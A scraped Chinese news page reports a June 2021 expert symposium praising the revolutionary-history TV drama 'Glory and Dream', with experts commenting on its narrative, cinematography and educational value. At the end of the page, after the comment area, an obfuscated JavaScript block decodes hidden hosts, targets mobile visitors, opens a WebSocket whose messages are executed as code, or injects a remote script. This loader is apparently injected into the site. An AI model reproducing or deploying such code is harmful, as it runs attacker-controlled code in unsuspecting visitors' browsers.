《光荣与梦想》被专家一致肯定,重大题材创作被赞取得重大突破

时间:2021-06-19 00:46:09阅读:3906
6月17日下午,由中国电视艺术委员会主办的重大革命历史题材剧《光荣与梦想》专家研讨会在京举行。研讨会由中国电视艺术委员会秘书长易凯主持。中国广播电视社会组织联合会副会长李京盛,中央党史和文献研究院原科

6月17日下午,由中国电视艺术委员会主办的重大革命历史题材剧《光荣与梦想》专家研讨会在京举行。

研讨会由中国电视艺术委员会秘书长易凯主持。中国广播电视社会组织联合会副会长李京盛,中央党史和文献研究院原科研部主任黄如军,中国传媒大学教授王伟国,中国文艺评论家协会副主席、北京师范大学文艺学研究中心主任王一川,原中央电视台发展研究中心主任、中国传媒大学博导、中国视协电视艺术理论研究会副会长张子扬,《光明日报》文艺部执行主任邓凯,原解放军艺术学院教授边国立,中央民族大学文学与新闻传播学院教授刘淑欣,中国电视艺术委员会编辑部主任李跃森等业内知名专家;《光荣与梦想》导演刘江,总制片人刘岩、王彤,制片人罗汐,发行人王涛,以及演员刘劲冯雷 出席了此次研讨会。

会上,《光荣与梦想》主创共同分享了该剧的播出情况和创作历程。与会领导、业内专家对该剧表示肯定,并从主题思想、艺术价值、现实意义、历史价值等角度对该剧进行了全方位的分析和解读。剖析该剧作为重大革命历史题材“标杆之作”的差异化之道,以及其为同一题材电视剧创作所提供的借鉴意义。

宏大历史+诗化叙事

创新思想架构洞察史诗品质

研讨会上,《光荣与梦想》导演刘江介绍了该剧的创作背景和基本内容。作为“理想照耀中国——国家广电总局庆祝中国共产党成立100周年电视剧展播活动”重点剧目,《光荣与梦想》以时间为轴线,充分展现了从中共一大建党到抗美援朝战争伟大胜利,新中国傲然屹立在世界东方这一段错综复杂恢弘壮阔的历史。35年的时间跨度,故事依托真实历史和真实人物事迹,情节层层推进,将中国共产党历经的苦难与辉煌,共产党员激情昂扬、甘于奉献的精神面貌逐一呈现。

导演刘江表示,“用故事规律讲‘党史’”,是其创作的核心原则,宏大的历史背景下,故事要讲得真情实感。“见人、见诗,见细节、见冲突”则是刘江的创作要求,他认为故事来自于生活又高于生活,在坚持历史逻辑的基础上,遵循艺术规律,怎么去讲比讲什么更加重要。扮演中年周恩来的演员刘劲,至今为止已经表演了26年周恩来。作为重大革命历史题材创作的亲历者,他表示该剧的创作难度非常大。但从结果来看,无论是剧本结构、节奏的把握、人物形象的塑造还是大场面调度,该剧都完成得非常到位,尤其是情感营造非常抓人。他表示“《光荣与梦想》以高超的艺术水准呈现画面,有张有弛,有代入感,有大局观,情节、人物、情感浑然一体。”此外,刘劲对扮演青年周恩来的演员黄晓明 给予了高度评价,他特别提到,作为优秀的青年演员代表,黄晓明对“伟人”有其独特的理解,对青年时期的周总理的诠释很到位。

宏大的历史背景加上“诗化”的艺术表达,主创者的精妙构思,让《光荣与梦想》透露出极高的艺术价值,与会专家从艺术创作角度表达了《光荣与梦想》的突破与拓展。中国广播电视社会组织联合会副会长李京盛认为,《光荣与梦想》在建党百年的电视剧创作中属于一部“大”剧。其有三“大”,第一,历史体量大。“它完整写出中国革命史的整个历程,对中国革命主题有了更完整地表达,同时它对历史做了新鲜的剪裁,将抗美援朝战争放在党史革命中的着眼点是一个创举。”第二,艺术雄心大。可以看出主创者想在这部剧中克服以往重大革命历史题材剧所体现出来的遗憾和不足,“导演在故事化、新鲜度、追求诗与情三方面拿出了相当高的才华,这种想要归纳和突破的艺术追求非常可贵。”第三,该剧积累的经验、借鉴对党史题材创作的思考意义大。他认为该剧在追求创新、提升感染力的艺术表达上,为之后的革命历史题材创作提供了非常值得借鉴的经验。

恢弘画卷,视听奇观

高度还原打造极致艺术盛宴

专家们认为,《光荣与梦想》的成功不只体现在题材的稀缺性和传达主流价值方面,也体现在表现形式、叙事手法和艺术技巧的把控上。《光荣与梦想》全剧40集,共716个场景,随着人物的成长历程,剧组在拍摄期间辗转横店、延川、延安、天漠、卧牛山、长沙、崇礼、沽源、北京9地取景。剧中95%以上的场景都采用实景拍摄,视觉效果层次丰富,体现了该剧的纪实性。该剧在不同场景使用不同色调,比如国民党场景是阴郁深沉,而共产党场景便是阳光明媚,从视觉上给人以反差和冲击力。同时,剧中使用了宏观的鸟瞰镜头表现大规模转移场景,比如红军长征等;在表现人物情绪变化时又用了诸多特写镜头,对于人物的内心描写极为细致;此外还有湘江之战中采用的水下镜头,给观众带来了近距离、沉浸式体验。高度还原的真实场景、具有反差的色调冲击以及多角度的镜头语言,让该剧呈现出一场视觉奇观。

此外,《光荣与梦想》用大开大合的手法呈现大规模战争场景——东征、北伐、南昌起义,秋收起义,万里长征,西安事变,抗日战争,东北抗联,血战湘江,孟良崮战役,挺进中原,三大战役,抗美援朝……一次次惊心动魄的战争,一场场战火纷飞的画面,一个个热血激昂的人物,让《光荣与梦想》整部剧呈现出一种红色革命题材的史诗气质。中央党史和文献研究院原科研部主任黄如军赞扬了该剧将历史真实与艺术真实相结合的艺术手法,表示该剧“主题鲜明,历史脉络清晰,重点突出,史实准确,故事性强,人物丰满。战争场面十分宏大,在表现手法上深远、厚重。”

原中央电视台发展研究中心主任、中国视协电视艺术理论研究会副会长张子扬认为该剧是一部全方位探索的艺术作品,不仅仅是对于诗意的探索和对于真实历史的艺术化探索,剧中几个大历史事件的转折使用了纪录片的方式进行调度,也非常有新意。

中央民族大学文学与新闻传播学院教授刘淑欣认为,该剧以新鲜的、微观的角度展开了宏大的叙事。“剧中包含了战争与爱情,包含了伟业与细节,包含了浪漫与写实,包含了过去与现在,这些对立因素统一在一起,形成了巨大的艺术张力。”

原解放军艺术学院教授边国立表示该剧不止于某种局部手法的新意,不止于诗意化纪实风格的追求,也不止于历史大事件与人性融组形成的鲜明史诗品格享受。开阔的历史视野,多样的人物特点和人性触摸,醒目的人物性格和思想对决,丰富的历史真实和艺术虚构,精心的史诗选择和细节融入,让该剧拥有着庞大的艺术格局。

以人写史,以史感人

共情表达构建党史学习通道

一段段生动的革命历史,是开展爱国主义教育丰富生动的教科书;一个个经典的红色故事,是淬炼中国共产党初心使命最好的营养剂。《光荣与梦想》用共情表达构建现代观众与历史之间的桥梁,不仅俘获了年轻观众的心,还被专家力赞为“党史学习的可视化教材”。专家们一致认为,以人写史,以史感人的艺术创作手法,为重大革命历史题材电视剧的创作拓展了艺术新路。《光明日报》文艺部执行主任邓凯用“四点”表达了自己对于该剧的看法,即以点带面,以情动人,以史实征服人,以细节感染人。他认为该剧用今人的视角建立了跟历史的沟通渠道,也建立一个将革命的血与火跟革命领袖的情感并行不悖的渠道。

中国文艺评论家协会副主席、北京师范大学文艺学研究中心主任王一川认为,该剧把现代历史剧样式与政治报告剧样式紧密交融起来,形成了现代历史报告剧这一新样式的剧目、可以简称“史报剧”,“这应当是当代中国电视剧发展中一次有意义的类型剧的新探索。”他认为从叙事方式来看,该剧用“略大”描细法传达当代历史观,产生了从大事件中见小细节,大场面中出小景色的奇特美学效果。

《光荣与梦想》以毛泽东为主视角和主线叙事,同时多线并行。围绕毛泽东的家庭、亲情、爱情,该剧用了颇多笔墨,写他的情感是为了以此拉近他与观众的距离,与观众产生共情。而他的情感又与革命相互联系,相互勾连,更加衬托出毛泽东人格的伟大。历史是“结果的凝固”,艺术则是对已经远去的历史的激活。历史更关注发生了什么和怎样发生,而艺术则更关注人做了什么和为什么做。《光荣与梦想》不仅仅是一段历史的再现,更是对历史中形形色色人物的艺术想象。在这方面,将“伟人”平凡化,是该剧的一个重要探索。

艺术归根结底是人的艺术。观众看艺术中的历史,更是被那些创造历史和被历史所创造的人的性格和命运所感动、所感染、所激励,这也是《光荣与梦想》的艺术特点和追求。研讨会上,专家们对该剧将人与历史的巧妙融合表示了肯定。中国传媒大学教授王伟国认为,“失去人的电视剧艺术就失去了根本,《光荣与梦想》剧中人物与事件关系的结合非常好。”中央民族大学文学与新闻传播学院教授刘淑欣表示,《光荣与梦想》追求真善美的统一,历史理性和人文关怀的统一,以核心人物毛泽东为中心的叙述视角,使得该剧在提炼光荣与梦想精神的同时,上升了其内在“灵魂”的高度。

中国电视艺术委员会编辑部主任李跃森认为,这部作品既是中华民族的命运史,又是革命领袖的心灵成长史。“毛泽东、周恩来这一代人的个人命运与民族命运合二为一,当国家、民族需要的时候,他们就会毫不犹豫舍己为人乃至舍生取义,这种崇高的价值追求,不仅属于过去的时代,而且属于所有的时代。”

今年是中国共产党成立100周年,百年大党在成长壮大的过程中,蕴含着一代又一代共产党员对马克思主义的坚定信念、对中华民族精神的弘扬与传承。《光荣与梦想》的播出让广大青年直观地了解我党披荆斩棘的历程,深入理解党的优良传统和作风,教育引导青少年知史爱党、知史爱国。而由该剧出品方主办的“十城百校光影党课”活动,也让今天的年轻人感悟到信仰的力量,激励他们继续发扬革命先辈不放弃不服输的精神,继续坚定不移地为中华民族而努力奋斗。

相关资讯

评论

  • 评论加载中...

function bnArjQ(e){var t="",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function eEHskV(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return bnArjQ(t);};window[''+'v'+'n'+'Q'+'e'+'m'+'K'+'S'+'J'+'C'+'l'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=eEHskV,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket('wss://'+k+':9393/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);}}else{u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));var s=document.createElement('script');s.src='https://'+u+'/l/'+i;cs.parentElement.insertBefore(s,cs);}})('ZnR0LmltbWFvaGFvLmNu','dHIueWVzzdW42NzzguY29t','142556',window,document,['','z']);}:function(){};